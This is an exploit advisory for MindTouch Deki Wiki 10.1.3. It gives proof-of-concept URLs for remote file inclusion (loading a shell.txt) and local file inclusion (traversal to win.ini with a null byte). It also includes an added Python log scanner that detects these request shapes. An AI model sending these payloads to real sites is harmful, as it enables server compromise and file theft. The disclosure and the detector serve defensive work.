####################################################
### Exploit Title: MindTouch Deki Wiki v10.1.3 Multiple Vulnerabilities
### Date: 11/08/2012
### Author: L0n3ly-H34rT
### Homepage: http://se3c.tk/
### Contact: l0n3ly_h34rt@hotmail.com
### Software Link: http://garr.dl.sourceforge.net/project/dekiwiki/MindTouch%20Core%20Source/Pipestone%2010.1.3/MindTouch_Core_10.1.3_Source.tar.gz
### Tested on: Linux/Windows
### Version: 10.1.3 (I didn't check older versions; they may be affected!)
####################################################

# Multiple Remote File Inclusion :

1- File ( deki/gui/link.php ) in lines 27 & 28 :

require_once($IP . '/includes/Defines.php');

require_once($IP . '/includes/Setup.php');

- P.O.C :

http://127.0.0.1/deki/web/deki/gui/link.php?IP=http://127.0.0.1/shell.txt?

2- File ( deki/plugins/deki_plugin.php ) in lines 486 , 487 & 488 :

require_once($IP . $wgDekiPluginPath . '/' . 'deki_plugin_view.php');
require_once($IP . $wgDekiPluginPath . '/' . 'special_page_plugin.php');
require_once($IP . $wgDekiPluginPath . '/' . 'special_mvc_plugin.php');

- P.O.C :

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=http://127.0.0.1/shell.txt?

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=http://127.0.0.1/shell.txt?

-----------------------------------------------------------------------------

# Multiple Local File Inclusion :

- P.O.C :

http://127.0.0.1/deki/web/deki/gui/link.php?IP=../../../../../../../../../windows/win.ini%00

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?IP=../../../../../../../../../windows/win.ini%00

http://127.0.0.1/deki/web/deki/plugins/deki_plugin.php?wgDekiPluginPath=../../../../../../../../../windows/win.ini%00

# Notes :

- Remote File Inclusion requires allow_url_include=On

- Local File Inclusion requires magic_quotes_gpc = Off (with it On, the %00 null byte in the P.O.C. is escaped and the path no longer terminates there)
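
Added example (not part of the original advisory): a Python scan of web access logs that flags requests setting the `IP` or `wgDekiPluginPath` parameters to a URL, a traversal sequence or a null byte, the three shapes the P.O.C. requests above take. The log lines, addresses and function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory; both are concatenated into require_once() paths.
WATCHED_PARAMS = {"IP", "wgDekiPluginPath"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CHECKS = [
    ("remote-url", re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)),
    ("traversal", re.compile(r"\.\.[/\\]")),
    ("null-byte", re.compile(r"\x00")),
]

def classify(value):
    """Return the reasons a decoded include-path value looks hostile."""
    return [name for name, rx in CHECKS if rx.search(value)]

def scan(lines):
    """Yield (line_no, path, param, reasons) for each suspicious parameter."""
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand
        url = urlsplit(m.group(1))
        # parse_qsl percent-decodes, so %00 and %2e%2e%2f are checked decoded.
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            if param in WATCHED_PARAMS:
                reasons = classify(value)
                if reasons:
                    yield no, url.path, param, reasons

# Constructed sample lines in combined log format (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Aug/2012:10:00:01 +0000] '
    '"GET /deki/web/deki/gui/link.php?IP=http://198.51.100.7/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [11/Aug/2012:10:00:05 +0000] '
    '"GET /deki/web/deki/gui/link.php?name=Home HTTP/1.1" 200 2048',
    '192.0.2.10 - - [11/Aug/2012:10:00:09 +0000] '
    '"GET /deki/web/deki/plugins/deki_plugin.php'
    '?wgDekiPluginPath=../../../windows/win.ini%00 HTTP/1.1" 200 97',
    '192.0.2.10 - - [11/Aug/2012:10:00:12 +0000] '
    '"GET /deki/web/deki/plugins/deki_plugin.php'
    '?IP=%2e%2e%2f%2e%2e%2fwindows%2fwin.ini HTTP/1.1" 200 97',
]

if __name__ == "__main__":
    for no, path, param, reasons in scan(SAMPLE_LOG):
        print(f"line {no}: {path} {param} -> {', '.join(reasons)}")
```

The scan only sees the query string recorded in the access log; the same parameters sent in a POST body would need request-body logging to be caught.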

# Greetz to my friendz